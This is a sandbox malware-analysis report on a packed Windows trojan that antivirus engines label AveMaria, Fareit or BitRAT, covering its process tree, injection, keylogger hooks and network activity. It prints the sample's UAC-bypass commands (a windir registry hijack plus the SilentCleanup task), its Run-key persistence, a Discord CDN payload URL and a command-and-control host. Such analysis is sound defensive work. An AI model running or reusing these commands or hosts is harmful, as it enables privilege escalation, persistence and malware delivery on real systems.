Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 14, 2021, 4:50 p.m.	July 14, 2021, 4:59 p.m.

Size	812.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`0d1a243f89e21f7c54a6210e5aa36d69`
SHA256	`fff4247394bb0e5f9ad20e8c3f00903a82562ae9eecf701447914bd744b0e61c`
CRC32	`12A744F4`
ssdeep	`12288:PXjVVvgR6lgIdw67J0/BVEULCi/FKGI9isgfDeuPqOeAM:PXjfrR+6dwJLxsr9isgfKPb`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

rc.exe "C:\Users\test22\AppData\Local\Temp\rc.exe"
2020
- rc.exe "C:\Users\test22\AppData\Local\Temp\rc.exe"
  3028
- cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
  2772
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
    1348
    - reg.exe reg delete hkcu\Environment /v windir /f
      2524
    - reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
      1032
    - schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      2948
- cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
  2260
  - reg.exe reg delete hkcu\Environment /v windir /f
    1684

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.130.233
arsaxa.ac.ug	A 79.134.225.25	79.134.225.25

IP Address	Status	Action
162.159.129.233	Active	Moloch
164.124.101.2	Active	Moloch
79.134.225.25	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 14, 2021, 4:51 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: /min reg delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW July 14, 2021, 4:51 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET https://cdn.discordapp.com/attachments/854297276549169165/864158213217321006/Mnzbrgxuodrjpaspnuzrcxakfetqbfg

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 14, 2021, 4:50 p.m.	process_identifier: 2020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 14, 2021, 4:50 p.m.	process_identifier: 2020 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c62000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 14, 2021, 4:51 p.m.	process_identifier: 3028 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c62000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\Public\KDECO.bat
file	C:\Users\Public\UKO.bat
file	C:\Users\Public\Libraries\Mnzbrgx\Mnzbrgx.exe
file	C:\Users\Public\Trast.bat
file	C:\Users\Public\nest.bat

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 14, 2021, 4:51 p.m.	process_identifier: 2020 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 77824 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x01f81000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 14, 2021, 4:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 14, 2021, 4:51 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1	0

Yara rule detected in process memory (50 out of 68 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	reg delete hkcu\Environment /v windir /f
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 520d0f21a1483b4f0a21ef8ac6e7320a9650e812

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 14, 2021, 4:51 p.m.	process_identifier: 3028 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1511424 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00672000 process_handle: 0x00000558	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation July 14, 2021, 4:51 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

rc.exe tried to sleep 13641201 seconds, actually delayed analysis time by 13641201 seconds

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Mnzbrgx

reg_value

C:\Users\Public\Libraries\xgrbznM.url

Deletes executed files from disk (1 event)

file	C:\Users\Public\UKO.bat

Installs an hook procedure to monitor for mouse events (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExW July 14, 2021, 4:51 p.m.	thread_identifier: 0 callback_function: 0x0050f84a hook_identifier: 14 (WH_MOUSE_LL) module_address: 0x00000000	1	3539271	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 14, 2021, 4:51 p.m.	buffer: <0>(0>h0>J0>X0>v0>KERNEL32.DLLExitProcessGetProcAddressLoadLibraryAVirtualProtect >2759P9T9X9\9p9´9À9 >2759P9T9X9\9p9´9À9 base_address: 0x007e3000 process_identifier: 3028 process_handle: 0x00000558	1	1	0
WriteProcessMemory July 14, 2021, 4:51 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3028 process_handle: 0x00000558	1	1	0

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExW July 14, 2021, 4:51 p.m.	thread_identifier: 0 callback_function: 0x004ca8cc hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00000000	1	3277397	0

Network activity contains more than one unique useragent (2 events)

process	rc.exe				useragent	zipo
process	rc.exe				useragent	aswe

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2020 called NtSetContextThread to modify thread in remote process 3028
NtSetContextThread July 14, 2021, 4:51 p.m.	registers.eip: 103119896 registers.esp: 3047424 registers.edi: 0 registers.eax: 8267568 registers.ebp: 78782801 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000550 process_identifier: 3028	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2020 resumed a thread in remote process 3028
Process injection	Process 2772 resumed a thread in remote process 1348
Process injection	Process 2260 resumed a thread in remote process 1684
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x00000550 suspend_count: 1 process_identifier: 3028	1	0	0
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1348	1	0	0
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1684	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (26 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 14, 2021, 4:51 p.m.	thread_identifier: 2932 thread_handle: 0x00000550 process_identifier: 3028 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\rc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\rc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000558	1	1
NtGetContextThread July 14, 2021, 4:51 p.m.	thread_handle: 0x00000550	1	0
NtUnmapViewOfSection July 14, 2021, 4:51 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 3028 process_handle: 0x00000558	1	0
NtAllocateVirtualMemory July 14, 2021, 4:51 p.m.	process_identifier: 3028 region_size: 4079616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000558	1	0
WriteProcessMemory July 14, 2021, 4:51 p.m.	buffer: base_address: 0x00400000 process_identifier: 3028 process_handle: 0x00000558	1	1
WriteProcessMemory July 14, 2021, 4:51 p.m.	buffer: base_address: 0x00401000 process_identifier: 3028 process_handle: 0x00000558		0
WriteProcessMemory July 14, 2021, 4:51 p.m.	buffer: base_address: 0x00672000 process_identifier: 3028 process_handle: 0x00000558	1	1
WriteProcessMemory July 14, 2021, 4:51 p.m.	buffer: <0>(0>h0>J0>X0>v0>KERNEL32.DLLExitProcessGetProcAddressLoadLibraryAVirtualProtect >2759P9T9X9\9p9´9À9 >2759P9T9X9\9p9´9À9 base_address: 0x007e3000 process_identifier: 3028 process_handle: 0x00000558	1	1
WriteProcessMemory July 14, 2021, 4:51 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3028 process_handle: 0x00000558	1	1
NtSetContextThread July 14, 2021, 4:51 p.m.	registers.eip: 103119896 registers.esp: 3047424 registers.edi: 0 registers.eax: 8267568 registers.ebp: 78782801 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000550 process_identifier: 3028	1	0
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x00000550 suspend_count: 1 process_identifier: 3028	1	0
CreateProcessInternalW July 14, 2021, 4:51 p.m.	thread_identifier: 1808 thread_handle: 0x0000055c process_identifier: 2772 current_directory: C:\Users\Public\ filepath: track: 1 command_line: "C:\Users\Public\Trast.bat" filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000554	1	1
CreateProcessInternalW July 14, 2021, 4:51 p.m.	thread_identifier: 1972 thread_handle: 0x0000055c process_identifier: 2260 current_directory: C:\Users\Public\ filepath: track: 1 command_line: "C:\Users\Public\nest.bat" filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000554	1	1
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 3028	1	0
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x000002cc suspend_count: 1 process_identifier: 3028	1	0
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x000002d4 suspend_count: 1 process_identifier: 3028	1	0
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x000002dc suspend_count: 1 process_identifier: 3028	1	0
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 3028	1	0
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x00000304 suspend_count: 1 process_identifier: 3028	1	0
CreateProcessInternalW July 14, 2021, 4:51 p.m.	thread_identifier: 2312 thread_handle: 0x00000088 process_identifier: 1348 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1348	1	0
CreateProcessInternalW July 14, 2021, 4:51 p.m.	thread_identifier: 2748 thread_handle: 0x00000088 process_identifier: 2524 current_directory: C:\Users\Public filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete hkcu\Environment /v windir /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 14, 2021, 4:51 p.m.	thread_identifier: 560 thread_handle: 0x00000084 process_identifier: 1032 current_directory: C:\Users\Public filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW July 14, 2021, 4:51 p.m.	thread_identifier: 2972 thread_handle: 0x00000088 process_identifier: 2948 current_directory: C:\Users\Public filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 14, 2021, 4:51 p.m.	thread_identifier: 2072 thread_handle: 0x00000088 process_identifier: 1684 current_directory: filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete hkcu\Environment /v windir /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
NtResumeThread July 14, 2021, 4:51 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1684	1	0

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.46618802
FireEye	Generic.mg.0d1a243f89e21f7c
McAfee	Fareit-FZO!0D1A243F89E2
Cylance	Unsafe
CrowdStrike	win/malicious_confidence_60% (W)
K7GW	Riskware ( 0040eff71 )
K7AntiVirus	Riskware ( 0040eff71 )
Cyren	W32/Delf_Troj.BE.gen!Eldorado
ESET-NOD32	a variant of Win32/Injector.EPSR
APEX	Malicious
Kaspersky	HEUR:Trojan-Spy.Win32.AveMaria.gen
BitDefender	Trojan.GenericKD.46618802
Avast	Win32:PWSX-gen [Trj]
Ad-Aware	Trojan.GenericKD.46618802
Sophos	Mal/Generic-S
DrWeb	Trojan.Inject4.14128
McAfee-GW-Edition	Fareit-FZO!0D1A243F89E2
Emsisoft	Trojan.GenericKD.46618802 (B)
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:Win32/DelfInject.RVL!MTB
Arcabit	Trojan.Generic.D2C758B2
GData	Trojan.GenericKD.46618802
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.FZO.R430971
BitDefenderTheta	Gen:NN.ZelphiF.34796.YGX@aGLEHdci
ALYac	Trojan.GenericKD.46618802
MAX	malware (ai score=82)
VBA32	TScope.Trojan.Delf
Malwarebytes	Backdoor.BitRAT
Rising	Trojan.Generic@ML.82 (RDMK:/zg5psnsRqThCX4r1JjoQw)
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Injector.EPMJ!tr
AVG	Win32:PWSX-gen [Trj]
Panda	Trj/GdSda.A
Qihoo-360	Win32/TrojanSpy.AveMaria.HgIASYUA

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (7 events)

dead_host	192.168.56.101:49226
dead_host	192.168.56.101:49223
dead_host	192.168.56.101:49225
dead_host	192.168.56.101:49224
dead_host	79.134.225.25:6970
dead_host	192.168.56.101:49215
dead_host	192.168.56.101:49214

rc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All